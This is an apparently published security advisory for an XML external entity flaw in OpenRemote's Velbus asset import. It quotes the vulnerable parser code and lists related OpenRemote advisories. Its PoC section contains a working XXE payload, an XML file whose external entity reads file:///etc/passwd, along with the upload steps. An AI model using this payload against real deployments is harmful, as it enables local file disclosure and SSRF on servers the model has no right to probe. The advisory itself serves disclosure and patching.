Vulnerability GHSA-g24f-mgc3-jwwc

High Risk
HIGH RISK
CVSS Score: 7.6
Score Range: 7.0–8.9
High severity vulnerabilities (CVSS 7.0–8.9). Serious vulnerabilities that should be prioritized soon after critical fixes.
5 months ago
April 15, 2026 at 07:42 PM UTC
OpenRemote has XXE in Velbus Asset Import
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0

Summary

OpenRemote has XXE in Velbus Asset Import

Details

Summary

The Velbus asset import path parses attacker-controlled XML without explicit XXE hardening. An authenticated user who can call the import endpoint may trigger XML external entity processing, which can lead to server-side file disclosure and SSRF. The target file must be less than 1023 characters.

Details

Velbus import uses DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(...) on untrusted XML input, without explicit safeguards to disable DTD/external entities.

    @Override
    public Future<Void> startAssetImport(byte[] fileData, Consumer<AssetTreeNode[]> assetConsumer) {

        return executorService.submit(() -> {
            Document xmlDoc;
            try {
                String xmlStr = new String(fileData, StandardCharsets.UTF_8);
                LOG.info("Parsing VELBUS project file");

                xmlDoc = DocumentBuilderFactory
                    .newInstance()
                    .newDocumentBuilder()
                    .parse(new InputSource(new StringReader(xmlStr)));

Expanded Caption content is propagated into created asset names:

                String name = module.getElementsByTagName("Caption").item(0).getTextContent();
                name = isNullOrEmpty(name) ? deviceType.toString() : name;

                // TODO: Use device specific asset types
                Asset<?> device = new ThingAsset(name);

PoC

  1. Log in to a realm with a user that can call Velbus asset import.
  2. Create/select a Velbus TCP Agent in that same realm.
  3. Send POST /api/{realm}/agent/assetImport/{agentId} with a Velbus project XML payload and compare behavior against a baseline import file.
  4. Save the below code as a xxe.xml and upload to Setup under https://localhost/manager/?realm=<YOUR_REALM>#/assets/false/<ASSET_ID>. Chnage the file:///etc/passwd to another file if your passwd is longer than 1023 characters.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE velbus [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<Project>
  <Module type="VMB1RY" address="01" build="00" serial="LAB">
    <Caption>&xxe;</Caption>
  </Module>
</Project>

As long as the file content is under 1023 characters, the exploit will succeed. image

If the file content reaches the limit, an error is thrown. image

Impact

  • Type: XML External Entity (XXE)
  • Affected: Deployments exposing Velbus import to authenticated users with import access
  • Risk: limited local file disclosure (as long as the file is under 1023 characters) from the Manager runtime, and SSRF.

Related Vulnerabilities

Other vulnerabilities affecting the same packages

High Risk
2 months ago
OpenRemote has Authenticated SQL Injection via Datapoint Crosstab Export
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.23.1 and 1.25.0 GHSA-cgfv-jrfp-2r7v
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.23.1 and 1.25.0 GHSA-cgfv-jrfp-2r7v
High Risk
2 months ago
OpenRemote has Cross-Realm User Information Disclosure in UserResourceImpl
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.24.1 GHSA-xqr9-4wvv-gvch
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.24.1 GHSA-xqr9-4wvv-gvch
Medium Risk
2 months ago
OpenRemote read-only asset users can write predicted datapoints
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.24.0 GHSA-xj53-j257-hxvg
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.24.0 GHSA-xj53-j257-hxvg
Critical
3 months ago
OpenRemote Manager: removeAlarms cross-realm IDOR (bulk delete)
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.23.1 GHSA-h3m5-97jq-qjrf
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.23.1 GHSA-h3m5-97jq-qjrf
High Risk
5 months ago
OpenRemote has Improper Access Control via updateUserRealmRoles function
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.22.0 GHSA-49vv-25qx-mg44
1.4.0 - 1.10.0 and 1.12.0 - 1.12.1 and 1.12.3 - 1.14.0 and 1.16.1 and 1.18.0 - 1.19.0 and 1.21.0 - 1.22.0 GHSA-49vv-25qx-mg44
View all vulnerabilities for these packages

Timeline

Published
5 months ago
April 15, 2026 at 07:42 PM UTC
Fixed (1.22.0)
Unknown
Unknown
Last Modified
4 months ago
May 05, 2026 at 04:06 PM UTC